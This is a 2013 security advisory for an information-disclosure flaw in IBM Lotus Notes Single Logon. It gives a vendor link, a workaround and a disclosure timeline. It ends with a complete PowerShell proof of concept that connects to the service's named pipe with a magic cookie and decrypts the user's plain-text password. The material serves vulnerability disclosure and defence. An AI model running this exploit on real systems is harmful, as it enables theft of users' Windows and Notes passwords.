Summary

  • Release Date: 2013-04-24
  • Product IBM Notes
  • Affected Versions: 7.x, 8.x, and 9.x with Notes Single Logon enabled
  • Vulnerability Type: Information Disclosure
  • Discovered By: Markus Piéton

  • Vendor Advisory: http://www-01.ibm.com/support/docview.wss?uid=swg21634508

IBM Lotus Notes’ Notes Single Logon feature allows, if Microsoft Windows logon passwords are synchronized with their Notes passwords, to use the same password for both Notes and the operating system. The implementation of the “Notes Single Logon” contains a flaw that enables an attacker to retrieve the plain text password.

The attacker can connect to the NamedPipe of the process nlsvice, called \\.\pipe\0x011325d6, and sends a special cookie (0x0012cc34) that is used to check if the request is legit. After that the obfuscated password can be read from the pipe.

Workaround

The Notes Single Logon feature is inherently flawed and should not be used. Disable Notes Single Logon and switch to Notes Shared Login or Notes Federated Login (available with Notes 9).

Timeline

Disclosure timeline:
----------------------------------------------------------------------
22/02/2013: Reported the vulnerability to the vendor.
20/03/2013: Request for confirmation of the issue.
29/03/2013: Vendor responded that a fix is in development.
15/04/2013: Vendor responded that no fix will be implemented.
16/04/2013: Vendor asks to delay advisory to prepare a security 
            bulletin till April, 26th.
24/04/2013: Vendor publishes security bulletin.

Proof of Concept

Function ForceToByte($number)
{
    return ($number -band 0xFF);
}

Function DecryptString($str, $length)
{
    if ($length -lt 8) { return; }
    if ($length -eq 8) { return $str; }
    $remainingLen = $length-8;
    $pos = 0;
    do {
        $str[$pos] = ForceToByte ($str[$pos+8] -bxor (
            (31 * $str[$pos+1]) +
            (97 * $str[$pos+0]) +
            (17 * $str[$pos+3]) +
            (23 * $str[$pos+4]) +
            (43 * $str[$pos+6]) + 
            (59 * $str[$pos+2]) +
            (79 * $str[$pos+7]) +
            (117 * $str[$pos+5])
        ));
        $pos += 1;
        $remainingLen -= 1;
    } while ($remainingLen -ge 0);
    [System.Text.Encoding]::ASCII.GetString($str, 0, $length-10);
}

$ascii = [System.Text.Encoding]::ASCII;
$namedPipeTimeout = 2 * 1000; # 2 secs.
$namedPipeStr = "0x011325d6";
$magicCookie = $ascii.GetBytes("0x0012cc34");

Write-Output "nslsvice_sploit v0.1 - Markus Piéton"
Write-Output "------------------------------`n";

Write-Output "[*] Connecting to 'secured pipe'.";
$pipe = New-Object System.IO.Pipes.NamedPipeClientStream(".", $namedPipeStr);
try {
    $pipe.Connect($namedPipeTimeout); 
} catch [TimeoutException] {
    Write-Output "[E] Couldn't connect to the Lotus Notes Single Logon Service!";
    Write-Verbose ("Pipe: " + $namedPipeStr);
    exit;
} catch [System.IO.IOException] {
    Write-Output "[E] The server is connected to another client and the time-out period has expired.";
    exit;
} catch [Exception] {
    Write-Output "[E] Unknown exception occured!";
    exit;
}

Write-Output "[*] Sending magic cookie.";
$pipe.Write($magicCookie, 0, $magicCookie.Length);

Write-Output "[*] Waiting for credentials to arrive.";
$buffer = New-Object byte[] 270;
$length = $pipe.Read($buffer, 0, $buffer.Length);
$pipe.Dispose()

Write-Output "[*] Decrypting password.`n";
Write-Output ("[+] Password: '" + (DecryptString $buffer $length) + "'`n");

Write-Output "Done.`n";